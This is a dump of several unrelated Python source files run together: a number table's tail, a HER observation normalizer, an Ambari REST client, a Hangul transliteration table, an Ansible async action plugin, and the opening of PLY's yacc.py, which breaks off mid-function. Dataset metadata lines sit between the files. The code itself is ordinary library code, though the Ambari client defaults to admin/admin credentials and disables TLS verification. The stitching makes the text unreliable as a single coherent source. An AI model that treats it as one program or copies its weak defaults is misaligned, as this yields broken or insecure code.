4505,13128,13129,13130,13131,13132,13133,13134,4996,4506,13135,13136,13137,13138,13139,4997, #13120
13140,13141,13142,13143,13144,13145,13146,13147,13148,13149,13150,13151,13152,13153,13154,13155, #13136
13156,13157,13158,13159,4998,13160,13161,13162,13163,13164,13165,13166,13167,13168,13169,13170, #13152
13171,13172,13173,13174,13175,13176,4999,13177,13178,13179,13180,13181,13182,13183,13184,13185, #13168
13186,13187,13188,13189,13190,13191,13192,13193,13194,13195,13196,13197,13198,13199,13200,13201, #13184
13202,13203,13204,13205,13206,5000,13207,13208,13209,13210,13211,13212,13213,13214,13215,13216, #13200
13217,13218,13219,13220,13221,13222,13223,13224,13225,13226,13227,4200,5001,13228,13229,13230, #13216
13231,13232,13233,13234,13235,13236,13237,13238,13239,13240,3969,13241,13242,13243,13244,3970, #13232
13245,13246,13247,13248,13249,13250,13251,13252,13253,13254,13255,13256,13257,13258,13259,13260, #13248
13261,13262,13263,13264,13265,13266,13267,13268,3450,13269,13270,13271,13272,13273,13274,13275, #13264
13276,5002,13277,13278,13279,13280,13281,13282,13283,13284,13285,13286,13287,13288,13289,13290, #13280
13291,13292,13293,13294,13295,13296,13297,13298,13299,13300,13301,13302,3813,13303,13304,13305, #13296
13306,13307,13308,13309,13310,13311,13312,13313,13314,13315,13316,13317,13318,13319,13320,13321, #13312
13322,13323,13324,13325,13326,13327,13328,4507,13329,13330,13331,13332,13333,13334,13335,13336, #13328
13337,13338,13339,13340,13341,5003,13342,13343,13344,13345,13346,13347,13348,13349,13350,13351, #13344
13352,13353,13354,13355,13356,13357,13358,13359,13360,13361,13362,13363,13364,13365,13366,13367, #13360
5004,13368,13369,13370,13371,13372,13373,13374,13375,13376,13377,13378,13379,13380,13381,13382, #13376
13383,13384,13385,13386,13387,13388,13389,13390,13391,13392,13393,13394,13395,13396,13397,13398, #13392
13399,13400,13401,13402,13403,13404,13405,13406,13407,13408,13409,13410,13411,13412,13413,13414, #13408
13415,13416,13417,13418,13419,13420,13421,13422,13423,13424,13425,13426,13427,13428,13429,13430, #13424
13431,13432,4508,13433,13434,13435,4201,13436,13437,13438,13439,13440,13441,13442,13443,13444, #13440
13445,13446,13447,13448,13449,13450,13451,13452,13453,13454,13455,13456,13457,5005,13458,13459, #13456
13460,13461,13462,13463,13464,13465,13466,13467,13468,13469,13470,4509,13471,13472,13473,13474, #13472
13475,13476,13477,13478,13479,13480,13481,13482,13483,13484,13485,13486,13487,13488,13489,13490, #13488
13491,13492,13493,13494,13495,13496,13497,13498,13499,13500,13501,13502,13503,13504,13505,13506, #13504
13507,13508,13509,13510,13511,13512,13513,13514,13515,13516,13517,13518,13519,13520,13521,13522, #13520
13523,13524,13525,13526,13527,13528,13529,13530,13531,13532,13533,13534,13535,13536,13537,13538, #13536
13539,13540,13541,13542,13543,13544,13545,13546,13547,13548,13549,13550,13551,13552,13553,13554, #13552
13555,13556,13557,13558,13559,13560,13561,13562,13563,13564,13565,13566,13567,13568,13569,13570, #13568
13571,13572,13573,13574,13575,13576,13577,13578,13579,13580,13581,13582,13583,13584,13585,13586, #13584
13587,13588,13589,13590,13591,13592,13593,13594,13595,13596,13597,13598,13599,13600,13601,13602, #13600
13603,13604,13605,13606,13607,13608,13609,13610,13611,13612,13613,13614,13615,13616,13617,13618, #13616
13619,13620,13621,13622,13623,13624,13625,13626,13627,13628,13629,13630,13631,13632,13633,13634, #13632
13635,13636,13637,13638,13639,13640,13641,13642,5006,13643,13644,13645,13646,13647,13648,13649, #13648
13650,13651,5007,13652,13653,13654,13655,13656,13657,13658,13659,13660,13661,13662,13663,13664, #13664
13665,13666,13667,13668,13669,13670,13671,13672,13673,13674,13675,13676,13677,13678,13679,13680, #13680
13681,13682,13683,13684,13685,13686,13687,13688,13689,13690,13691,13692,13693,13694,13695,13696, #13696
13697,13698,13699,13700,13701,13702,13703,13704,13705,13706,13707,13708,13709,13710,13711,13712, #13712
13713,13714,13715,13716,13717,13718,13719,13720,13721,13722,13723,13724,13725,13726,13727,13728, #13728
13729,13730,13731,13732,13733,13734,13735,13736,13737,13738,13739,13740,13741,13742,13743,13744, #13744
13745,13746,13747,13748,13749,13750,13751,13752,13753,13754,13755,13756,13757,13758,13759,13760, #13760
13761,13762,13763,13764,13765,13766,13767,13768,13769,13770,13771,13772,13773,13774,3273,13775, #13776
13776,13777,13778,13779,13780,13781,13782,13783,13784,13785,13786,13787,13788,13789,13790,13791, #13792
13792,13793,13794,13795,13796,13797,13798,13799,13800,13801,13802,13803,13804,13805,13806,13807, #13808
13808,13809,13810,13811,13812,13813,13814,13815,13816,13817,13818,13819,13820,13821,13822,13823, #13824
13824,13825,13826,13827,13828,13829,13830,13831,13832,13833,13834,13835,13836,13837,13838,13839, #13840
13840,13841,13842,13843,13844,13845,13846,13847,13848,13849,13850,13851,13852,13853,13854,13855, #13856
13856,13857,13858,13859,13860,13861,13862,13863,13864,13865,13866,13867,13868,13869,13870,13871, #13872
13872,13873,13874,13875,13876,13877,13878,13879,13880,13881,13882,13883,13884,13885,13886,13887, #13888
13888,13889,13890,13891,13892,13893,13894,13895,13896,13897,13898,13899,13900,13901,13902,13903, #13904
13904,13905,13906,13907,13908,13909,13910,13911,13912,13913,13914,13915,13916,13917,13918,13919, #13920
13920,13921,13922,13923,13924,13925,13926,13927,13928,13929,13930,13931,13932,13933,13934,13935, #13936
13936,13937,13938,13939,13940,13941,13942,13943,13944,13945,13946,13947,13948,13949,13950,13951, #13952
13952,13953,13954,13955,13956,13957,13958,13959,13960,13961,13962,13963,13964,13965,13966,13967, #13968
13968,13969,13970,13971,13972) #13973
# flake8: noqa
| mit |
openai/baselines | baselines/her/normalizer.py | 1 | 5304 | import threading
import numpy as np
from mpi4py import MPI
import tensorflow as tf
from baselines.her.util import reshape_for_broadcasting
class Normalizer:
    def __init__(self, size, eps=1e-2, default_clip_range=np.inf, sess=None):
        """A normalizer that ensures that observations are approximately distributed according to
        a standard Normal distribution (i.e. have mean zero and variance one).

        Statistics are accumulated locally in numpy buffers by update() and
        periodically folded into TensorFlow variables (after being averaged
        across MPI workers) by recompute_stats().

        Args:
            size (int): the size of the observation to be normalized
            eps (float): a small constant that avoids underflows
            default_clip_range (float): normalized observations are clipped to be in
                [-default_clip_range, default_clip_range]
            sess (object): the TensorFlow session to be used
        """
        self.size = size
        self.eps = eps
        self.default_clip_range = default_clip_range
        # Fall back to the ambient default session when none is given.
        self.sess = sess if sess is not None else tf.get_default_session()

        # Local (per-process) accumulators; drained by recompute_stats().
        self.local_sum = np.zeros(self.size, np.float32)
        self.local_sumsq = np.zeros(self.size, np.float32)
        self.local_count = np.zeros(1, np.float32)

        # Graph-side running totals. Note that count is initialized to one,
        # not zero (presumably so mean/std stay finite before any data has
        # been folded in — confirm against recompute_op below).
        self.sum_tf = tf.get_variable(
            initializer=tf.zeros_initializer(), shape=self.local_sum.shape, name='sum',
            trainable=False, dtype=tf.float32)
        self.sumsq_tf = tf.get_variable(
            initializer=tf.zeros_initializer(), shape=self.local_sumsq.shape, name='sumsq',
            trainable=False, dtype=tf.float32)
        self.count_tf = tf.get_variable(
            initializer=tf.ones_initializer(), shape=self.local_count.shape, name='count',
            trainable=False, dtype=tf.float32)
        # Derived statistics actually read by normalize()/denormalize().
        self.mean = tf.get_variable(
            initializer=tf.zeros_initializer(), shape=(self.size,), name='mean',
            trainable=False, dtype=tf.float32)
        self.std = tf.get_variable(
            initializer=tf.ones_initializer(), shape=(self.size,), name='std',
            trainable=False, dtype=tf.float32)
        # Placeholders through which the synchronized deltas are fed.
        self.count_pl = tf.placeholder(name='count_pl', shape=(1,), dtype=tf.float32)
        self.sum_pl = tf.placeholder(name='sum_pl', shape=(self.size,), dtype=tf.float32)
        self.sumsq_pl = tf.placeholder(name='sumsq_pl', shape=(self.size,), dtype=tf.float32)

        # Adds the fed deltas onto the graph-side running totals.
        self.update_op = tf.group(
            self.count_tf.assign_add(self.count_pl),
            self.sum_tf.assign_add(self.sum_pl),
            self.sumsq_tf.assign_add(self.sumsq_pl)
        )
        # Recomputes mean/std from the totals; the variance estimate is
        # floored at eps**2 so std >= eps and normalize() never divides by
        # (near) zero.
        self.recompute_op = tf.group(
            tf.assign(self.mean, self.sum_tf / self.count_tf),
            tf.assign(self.std, tf.sqrt(tf.maximum(
                tf.square(self.eps),
                self.sumsq_tf / self.count_tf - tf.square(self.sum_tf / self.count_tf)
            ))),
        )
        # Guards concurrent access to the local_* buffers.
        self.lock = threading.Lock()

    def update(self, v):
        """Accumulate a batch of observations into the local statistics.

        v is reshaped to (-1, size), i.e. any leading batch dimensions are
        flattened before summation.
        """
        v = v.reshape(-1, self.size)

        with self.lock:
            self.local_sum += v.sum(axis=0)
            self.local_sumsq += (np.square(v)).sum(axis=0)
            self.local_count[0] += v.shape[0]

    def normalize(self, v, clip_range=None):
        """Return (v - mean) / std clipped to [-clip_range, clip_range]."""
        if clip_range is None:
            clip_range = self.default_clip_range
        mean = reshape_for_broadcasting(self.mean, v)
        std = reshape_for_broadcasting(self.std, v)
        return tf.clip_by_value((v - mean) / std, -clip_range, clip_range)

    def denormalize(self, v):
        """Inverse of normalize() (without the clipping): mean + v * std."""
        mean = reshape_for_broadcasting(self.mean, v)
        std = reshape_for_broadcasting(self.std, v)
        return mean + v * std

    def _mpi_average(self, x):
        # Element-wise mean of x over all MPI workers (sum, then divide by
        # the communicator size).
        buf = np.zeros_like(x)
        MPI.COMM_WORLD.Allreduce(x, buf, op=MPI.SUM)
        buf /= MPI.COMM_WORLD.Get_size()
        return buf

    def synchronize(self, local_sum, local_sumsq, local_count, root=None):
        """Replace the given buffers in-place with their MPI-wide averages.

        The root argument is accepted but unused here (kept for API
        compatibility with callers — TODO confirm).
        """
        local_sum[...] = self._mpi_average(local_sum)
        local_sumsq[...] = self._mpi_average(local_sumsq)
        local_count[...] = self._mpi_average(local_count)
        return local_sum, local_sumsq, local_count

    def recompute_stats(self):
        """Drain local statistics into the TF variables and refresh mean/std."""
        with self.lock:
            # Copy over results.
            local_count = self.local_count.copy()
            local_sum = self.local_sum.copy()
            local_sumsq = self.local_sumsq.copy()

            # Reset.
            self.local_count[...] = 0
            self.local_sum[...] = 0
            self.local_sumsq[...] = 0

        # We perform the synchronization outside of the lock to keep the critical section as short
        # as possible.
        synced_sum, synced_sumsq, synced_count = self.synchronize(
            local_sum=local_sum, local_sumsq=local_sumsq, local_count=local_count)

        # Fold the synchronized deltas into the running totals, then derive
        # the new mean/std from them.
        self.sess.run(self.update_op, feed_dict={
            self.count_pl: synced_count,
            self.sum_pl: synced_sum,
            self.sumsq_pl: synced_sumsq,
        })
        self.sess.run(self.recompute_op)
class IdentityNormalizer:
    """Drop-in stand-in for Normalizer that tracks no statistics.

    The mean is a constant zero tensor and the std a constant tensor, so
    normalization reduces to a fixed elementwise division. All the
    statistics-related entry points exist but do nothing.
    """

    def __init__(self, size, std=1.):
        self.size = size
        self.mean = tf.zeros(self.size, tf.float32)
        self.std = std * tf.ones(self.size, tf.float32)

    def update(self, x):
        """No-op: the statistics are fixed."""
        return None

    def normalize(self, x, clip_range=None):
        """Scale x by 1/std. clip_range is accepted for API parity only."""
        return x / self.std

    def denormalize(self, x):
        """Undo normalize(): multiply x back by std (mean is zero)."""
        return self.std * x

    def synchronize(self):
        """No-op: nothing to average across workers."""
        return None

    def recompute_stats(self):
        """No-op: mean/std never change."""
        return None
| mit |
crobby/sahara | sahara/plugins/ambari/client.py | 2 | 4171 | # Copyright (c) 2015 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from oslo_serialization import jsonutils
from requests import auth
class AmbariClient(object):
    """Minimal client for the Ambari REST API (api/v1) of one instance.

    The HTTP transport, basic-auth credentials and the mandatory
    ``X-Requested-By`` header are configured once in the constructor and
    attached to every request. Meant to be used as a context manager so
    the underlying HTTP session is always released.
    """

    def __init__(self, instance, port="8080", **kwargs):
        # Ambari ships with admin/admin unless the caller overrides them.
        username = kwargs.setdefault("username", "admin")
        password = kwargs.setdefault("password", "admin")

        self._port = port
        self._base_url = "http://{host}:{port}/api/v1".format(
            host=instance.management_ip, port=port)
        self._instance = instance
        self._http_client = instance.remote().get_http_client(port)
        self._headers = {"X-Requested-By": "sahara"}
        self._auth = auth.HTTPBasicAuth(username, password)
        self._default_client_args = {"verify": False, "auth": self._auth,
                                     "headers": self._headers}

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        self.close()

    def close(self):
        """Release the HTTP session held for this instance/port."""
        self._instance.remote().close_http_session(self._port)

    def _request(self, method, *args, **kwargs):
        # Every call carries the shared auth/header/verify defaults; they
        # intentionally take precedence over caller-supplied values.
        kwargs.update(self._default_client_args)
        return getattr(self._http_client, method)(*args, **kwargs)

    def get(self, *args, **kwargs):
        return self._request("get", *args, **kwargs)

    def post(self, *args, **kwargs):
        return self._request("post", *args, **kwargs)

    def put(self, *args, **kwargs):
        return self._request("put", *args, **kwargs)

    def delete(self, *args, **kwargs):
        return self._request("delete", *args, **kwargs)

    @staticmethod
    def check_response(resp):
        """Raise for HTTP errors; decode and return the JSON body, if any."""
        resp.raise_for_status()
        body = resp.text
        if not body:
            return None
        return jsonutils.loads(body)

    def get_registered_hosts(self):
        """Return the list of hosts known to this Ambari server."""
        resp = self.get(self._base_url + "/hosts")
        return self.check_response(resp).get("items", [])

    def get_host_info(self, host):
        """Return the "Hosts" attributes of one registered host."""
        resp = self.get(self._base_url + "/hosts/%s" % host)
        return self.check_response(resp).get("Hosts", {})

    def update_user_password(self, user, old_password, new_password):
        """Change an Ambari user's password."""
        payload = jsonutils.dumps({
            "Users": {
                "old_password": old_password,
                "password": new_password
            }
        })
        resp = self.put(self._base_url + "/users/%s" % user, data=payload)
        self.check_response(resp)

    def create_blueprint(self, name, data):
        """Register a cluster blueprint under the given name."""
        resp = self.post(self._base_url + "/blueprints/%s" % name,
                         data=jsonutils.dumps(data))
        self.check_response(resp)

    def create_cluster(self, name, data):
        """Kick off cluster creation; returns the async "Requests" handle."""
        resp = self.post(self._base_url + "/clusters/%s" % name,
                         data=jsonutils.dumps(data))
        return self.check_response(resp).get("Requests")

    def check_request_status(self, cluster_name, req_id):
        """Poll the state of an asynchronous cluster request."""
        url = self._base_url + "/clusters/%s/requests/%d" % (cluster_name,
                                                             req_id)
        return self.check_response(self.get(url)).get("Requests")

    def set_up_mirror(self, stack_version, os_type, repo_id, repo_url):
        """Point a stack repository at an alternate mirror URL."""
        url = self._base_url + (
            "/stacks/HDP/versions/%s/operating_systems/%s/repositories/%s") % (
            stack_version, os_type, repo_id)
        payload = jsonutils.dumps({
            "Repositories": {
                "base_url": repo_url,
                "verify_base_url": True
            }
        })
        self.check_response(self.put(url, data=payload))
| apache-2.0 |
andris210296/andris-projeto | backend/venv/lib/python2.7/site-packages/unidecode/x0ca.py | 253 | 5007 | data = (
# 256-entry ASCII transliteration table for one Unicode block: data[n] is
# the replacement string for the code point whose low byte is n (the
# inline "# 0xNN" comments give that index). Entries here are Hangul
# syllable romanizations.
'jjael', # 0x00
'jjaelg', # 0x01
'jjaelm', # 0x02
'jjaelb', # 0x03
'jjaels', # 0x04
'jjaelt', # 0x05
'jjaelp', # 0x06
'jjaelh', # 0x07
'jjaem', # 0x08
'jjaeb', # 0x09
'jjaebs', # 0x0a
'jjaes', # 0x0b
'jjaess', # 0x0c
'jjaeng', # 0x0d
'jjaej', # 0x0e
'jjaec', # 0x0f
'jjaek', # 0x10
'jjaet', # 0x11
'jjaep', # 0x12
'jjaeh', # 0x13
'jjya', # 0x14
'jjyag', # 0x15
'jjyagg', # 0x16
'jjyags', # 0x17
'jjyan', # 0x18
'jjyanj', # 0x19
'jjyanh', # 0x1a
'jjyad', # 0x1b
'jjyal', # 0x1c
'jjyalg', # 0x1d
'jjyalm', # 0x1e
'jjyalb', # 0x1f
'jjyals', # 0x20
'jjyalt', # 0x21
'jjyalp', # 0x22
'jjyalh', # 0x23
'jjyam', # 0x24
'jjyab', # 0x25
'jjyabs', # 0x26
'jjyas', # 0x27
'jjyass', # 0x28
'jjyang', # 0x29
'jjyaj', # 0x2a
'jjyac', # 0x2b
'jjyak', # 0x2c
'jjyat', # 0x2d
'jjyap', # 0x2e
'jjyah', # 0x2f
'jjyae', # 0x30
'jjyaeg', # 0x31
'jjyaegg', # 0x32
'jjyaegs', # 0x33
'jjyaen', # 0x34
'jjyaenj', # 0x35
'jjyaenh', # 0x36
'jjyaed', # 0x37
'jjyael', # 0x38
'jjyaelg', # 0x39
'jjyaelm', # 0x3a
'jjyaelb', # 0x3b
'jjyaels', # 0x3c
'jjyaelt', # 0x3d
'jjyaelp', # 0x3e
'jjyaelh', # 0x3f
'jjyaem', # 0x40
'jjyaeb', # 0x41
'jjyaebs', # 0x42
'jjyaes', # 0x43
'jjyaess', # 0x44
'jjyaeng', # 0x45
'jjyaej', # 0x46
'jjyaec', # 0x47
'jjyaek', # 0x48
'jjyaet', # 0x49
'jjyaep', # 0x4a
'jjyaeh', # 0x4b
'jjeo', # 0x4c
'jjeog', # 0x4d
'jjeogg', # 0x4e
'jjeogs', # 0x4f
'jjeon', # 0x50
'jjeonj', # 0x51
'jjeonh', # 0x52
'jjeod', # 0x53
'jjeol', # 0x54
'jjeolg', # 0x55
'jjeolm', # 0x56
'jjeolb', # 0x57
'jjeols', # 0x58
'jjeolt', # 0x59
'jjeolp', # 0x5a
'jjeolh', # 0x5b
'jjeom', # 0x5c
'jjeob', # 0x5d
'jjeobs', # 0x5e
'jjeos', # 0x5f
'jjeoss', # 0x60
'jjeong', # 0x61
'jjeoj', # 0x62
'jjeoc', # 0x63
'jjeok', # 0x64
'jjeot', # 0x65
'jjeop', # 0x66
'jjeoh', # 0x67
'jje', # 0x68
'jjeg', # 0x69
'jjegg', # 0x6a
'jjegs', # 0x6b
'jjen', # 0x6c
'jjenj', # 0x6d
'jjenh', # 0x6e
'jjed', # 0x6f
'jjel', # 0x70
'jjelg', # 0x71
'jjelm', # 0x72
'jjelb', # 0x73
'jjels', # 0x74
'jjelt', # 0x75
'jjelp', # 0x76
'jjelh', # 0x77
'jjem', # 0x78
'jjeb', # 0x79
'jjebs', # 0x7a
'jjes', # 0x7b
'jjess', # 0x7c
'jjeng', # 0x7d
'jjej', # 0x7e
'jjec', # 0x7f
'jjek', # 0x80
'jjet', # 0x81
'jjep', # 0x82
'jjeh', # 0x83
'jjyeo', # 0x84
'jjyeog', # 0x85
'jjyeogg', # 0x86
'jjyeogs', # 0x87
'jjyeon', # 0x88
'jjyeonj', # 0x89
'jjyeonh', # 0x8a
'jjyeod', # 0x8b
'jjyeol', # 0x8c
'jjyeolg', # 0x8d
'jjyeolm', # 0x8e
'jjyeolb', # 0x8f
'jjyeols', # 0x90
'jjyeolt', # 0x91
'jjyeolp', # 0x92
'jjyeolh', # 0x93
'jjyeom', # 0x94
'jjyeob', # 0x95
'jjyeobs', # 0x96
'jjyeos', # 0x97
'jjyeoss', # 0x98
'jjyeong', # 0x99
'jjyeoj', # 0x9a
'jjyeoc', # 0x9b
'jjyeok', # 0x9c
'jjyeot', # 0x9d
'jjyeop', # 0x9e
'jjyeoh', # 0x9f
'jjye', # 0xa0
'jjyeg', # 0xa1
'jjyegg', # 0xa2
'jjyegs', # 0xa3
'jjyen', # 0xa4
'jjyenj', # 0xa5
'jjyenh', # 0xa6
'jjyed', # 0xa7
'jjyel', # 0xa8
'jjyelg', # 0xa9
'jjyelm', # 0xaa
'jjyelb', # 0xab
'jjyels', # 0xac
'jjyelt', # 0xad
'jjyelp', # 0xae
'jjyelh', # 0xaf
'jjyem', # 0xb0
'jjyeb', # 0xb1
'jjyebs', # 0xb2
'jjyes', # 0xb3
'jjyess', # 0xb4
'jjyeng', # 0xb5
'jjyej', # 0xb6
'jjyec', # 0xb7
'jjyek', # 0xb8
'jjyet', # 0xb9
'jjyep', # 0xba
'jjyeh', # 0xbb
'jjo', # 0xbc
'jjog', # 0xbd
'jjogg', # 0xbe
'jjogs', # 0xbf
'jjon', # 0xc0
'jjonj', # 0xc1
'jjonh', # 0xc2
'jjod', # 0xc3
'jjol', # 0xc4
'jjolg', # 0xc5
'jjolm', # 0xc6
'jjolb', # 0xc7
'jjols', # 0xc8
'jjolt', # 0xc9
'jjolp', # 0xca
'jjolh', # 0xcb
'jjom', # 0xcc
'jjob', # 0xcd
'jjobs', # 0xce
'jjos', # 0xcf
'jjoss', # 0xd0
'jjong', # 0xd1
'jjoj', # 0xd2
'jjoc', # 0xd3
'jjok', # 0xd4
'jjot', # 0xd5
'jjop', # 0xd6
'jjoh', # 0xd7
'jjwa', # 0xd8
'jjwag', # 0xd9
'jjwagg', # 0xda
'jjwags', # 0xdb
'jjwan', # 0xdc
'jjwanj', # 0xdd
'jjwanh', # 0xde
'jjwad', # 0xdf
'jjwal', # 0xe0
'jjwalg', # 0xe1
'jjwalm', # 0xe2
'jjwalb', # 0xe3
'jjwals', # 0xe4
'jjwalt', # 0xe5
'jjwalp', # 0xe6
'jjwalh', # 0xe7
'jjwam', # 0xe8
'jjwab', # 0xe9
'jjwabs', # 0xea
'jjwas', # 0xeb
'jjwass', # 0xec
'jjwang', # 0xed
'jjwaj', # 0xee
'jjwac', # 0xef
'jjwak', # 0xf0
'jjwat', # 0xf1
'jjwap', # 0xf2
'jjwah', # 0xf3
'jjwae', # 0xf4
'jjwaeg', # 0xf5
'jjwaegg', # 0xf6
'jjwaegs', # 0xf7
'jjwaen', # 0xf8
'jjwaenj', # 0xf9
'jjwaenh', # 0xfa
'jjwaed', # 0xfb
'jjwael', # 0xfc
'jjwaelg', # 0xfd
'jjwaelm', # 0xfe
'jjwaelb', # 0xff
)
| mit |
garlandkr/ansible | lib/ansible/runner/action_plugins/async.py | 6 | 1940 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from ansible.runner.return_data import ReturnData
class ActionModule(object):
    """Action plugin that stages a module together with the async wrapper
    on the remote host and kicks it off in the background."""

    def __init__(self, runner):
        # runner: the Runner instance driving this task execution
        self.runner = runner

    def run(self, conn, tmp, module_name, module_args, inject, complex_args=None, **kwargs):
        ''' transfer the given module name, plus the async module, then run it '''

        # Background execution cannot be simulated, so skip in check mode.
        if self.runner.noop_on_check(inject):
            return ReturnData(conn=conn, comm_ok=True, result=dict(skipped=True, msg='check mode not supported for this module'))

        # shell and command module are the same; the marker tells the remote
        # command module to run the line through a shell.
        if module_name == 'shell':
            module_name = 'command'
            module_args += " #USE_SHELL"

        # Ensure we have a remote temp directory to stage the module in.
        # (idiomatic substring test instead of .find(...) == -1)
        if "tmp" not in tmp:
            tmp = self.runner._make_tmp_path(conn)

        (module_path, is_new_style, shebang) = self.runner._copy_module(conn, tmp, module_name, module_args, inject, complex_args=complex_args)
        self.runner._low_level_exec_command(conn, "chmod a+rx %s" % module_path, tmp)

        # Run the async wrapper, pointing it at the staged module.
        return self.runner._execute_module(conn, tmp, 'async_wrapper', module_args,
           async_module=module_path,
           async_jid=self.runner.generated_jid,
           async_limit=self.runner.background,
           inject=inject
        )
| gpl-3.0 |
Teamxrtc/webrtc-streaming-node | third_party/webrtc/src/chromium/src/third_party/ply/yacc.py | 465 | 128492 | # -----------------------------------------------------------------------------
# ply: yacc.py
#
# Copyright (C) 2001-2011,
# David M. Beazley (Dabeaz LLC)
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the David Beazley or Dabeaz LLC may be used to
# endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# -----------------------------------------------------------------------------
#
# This implements an LR parser that is constructed from grammar rules defined
# as Python functions. The grammer is specified by supplying the BNF inside
# Python documentation strings. The inspiration for this technique was borrowed
# from John Aycock's Spark parsing system. PLY might be viewed as cross between
# Spark and the GNU bison utility.
#
# The current implementation is only somewhat object-oriented. The
# LR parser itself is defined in terms of an object (which allows multiple
# parsers to co-exist). However, most of the variables used during table
# construction are defined in terms of global variables. Users shouldn't
# notice unless they are trying to define multiple parsers at the same
# time using threads (in which case they should have their head examined).
#
# This implementation supports both SLR and LALR(1) parsing. LALR(1)
# support was originally implemented by Elias Ioup (ezioup@alumni.uchicago.edu),
# using the algorithm found in Aho, Sethi, and Ullman "Compilers: Principles,
# Techniques, and Tools" (The Dragon Book). LALR(1) has since been replaced
# by the more efficient DeRemer and Pennello algorithm.
#
# :::::::: WARNING :::::::
#
# Construction of LR parsing tables is fairly complicated and expensive.
# To make this module run fast, a *LOT* of work has been put into
# optimization---often at the expensive of readability and what might
# consider to be good Python "coding style." Modify the code at your
# own risk!
# ----------------------------------------------------------------------------
__version__ = "3.4"
__tabversion__ = "3.2"       # Table version
#-----------------------------------------------------------------------------
#                     === User configurable parameters ===
#
# Change these to modify the default behavior of yacc (if you wish)
#-----------------------------------------------------------------------------
yaccdebug = 1                # Debugging mode.  If set, yacc generates
                             # a 'parser.out' file in the current directory
debug_file = 'parser.out'    # Default name of the debugging file
tab_module = 'parsetab'      # Default name of the table module
default_lr = 'LALR'          # Default LR table generation method
error_count = 3              # Number of symbols that must be shifted to leave recovery mode
yaccdevel = 0                # Set to True if developing yacc.  This turns off optimized
                             # implementations of certain functions.
resultlimit = 40             # Size limit of results when running in debug mode.
pickle_protocol = 0          # Protocol to use when writing pickle files
import re, types, sys, os.path
# Compatibility function for python 2.6/3.0
if sys.version_info[0] >= 3:
    def func_code(f):
        """Return the code object of function *f* (Python 3 spelling)."""
        return f.__code__
else:
    def func_code(f):
        """Return the code object of function *f* (Python 2 spelling)."""
        return f.func_code
# Compatibility: Python 2 has sys.maxint, Python 3 only sys.maxsize.
MAXINT = getattr(sys, 'maxint', sys.maxsize)
# Python 2.x/3.0 compatibility.
def load_ply_lex():
    """Import and return the lex module appropriate for this Python version."""
    if sys.version_info[0] >= 3:
        import ply.lex as lex
    else:
        import lex
    return lex
# This object is a stand-in for a logging object created by the
# logging module. PLY will use this by default to create things
# such as the parser.out file. If a user wants more detailed
# information, they can create their own logging object and pass
# it into PLY.
class PlyLogger(object):
    """Minimal stand-in for a logging.Logger that writes to a file object.

    PLY uses this by default to produce things such as the parser.out
    file; users wanting richer output can pass a real logger instead.
    """
    def __init__(self, f):
        self.f = f

    def _emit(self, prefix, msg, args):
        # All levels funnel through here: prefix + %-formatted message.
        self.f.write(prefix + (msg % args) + "\n")

    def debug(self, msg, *args, **kwargs):
        self._emit("", msg, args)

    info = debug

    def warning(self, msg, *args, **kwargs):
        self._emit("WARNING: ", msg, args)

    def error(self, msg, *args, **kwargs):
        self._emit("ERROR: ", msg, args)

    # NOTE: in the original, critical deliberately aliases debug (no prefix).
    critical = debug
# Null logger is used when no output is generated. Does nothing.
class NullLogger(object):
    """Logger stand-in that silently swallows everything.

    Every attribute access returns the instance itself, and calling it
    also returns the instance, so arbitrarily long chains such as
    ``log.debug(...)`` or ``log.a.b.c(...)`` are all no-ops.
    """
    def __getattribute__(self,name):
        return self
    def __call__(self,*args,**kwargs):
        return self
# Exception raised for yacc-related errors
class YaccError(Exception):
    """Exception raised for yacc-related errors."""
    pass
# Format the result message that the parser produces when running in debug mode.
def format_result(r):
    """Render value ``r`` as '<type @ 0xADDR> (repr)', truncating long reprs."""
    text = repr(r)
    if '\n' in text:
        # Flatten multi-line reprs onto a single line by re-repr'ing.
        text = repr(text)
    if len(text) > resultlimit:
        text = text[:resultlimit] + " ..."
    return "<%s @ 0x%x> (%s)" % (type(r).__name__, id(r), text)
# Format stack entries when the parser is running in debug mode
def format_stack_entry(r):
    """Short display form for a parser-stack value: the repr itself when
    small, otherwise just '<type @ 0xADDR>'."""
    text = repr(r)
    if '\n' in text:
